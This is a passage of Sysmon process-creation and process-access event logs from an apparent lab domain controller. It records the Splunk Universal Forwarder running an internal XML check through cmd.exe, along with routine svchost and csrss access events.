Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3502,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nProcessGuid: {A837DB8D-023C-5F25-0000-0010E84F0500}\r\nProcessId: 4732\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","ProcessGuid":"{A837DB8D-023C-5F25-0000-0010E84F0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3503,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010E84F0500}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010E84F0500}","TargetProcessId":"4732","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3504,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010E84F0500}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010E84F0500}","TargetProcessId":"4732","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3505,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3506,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3507,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3508,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3509,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3510,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 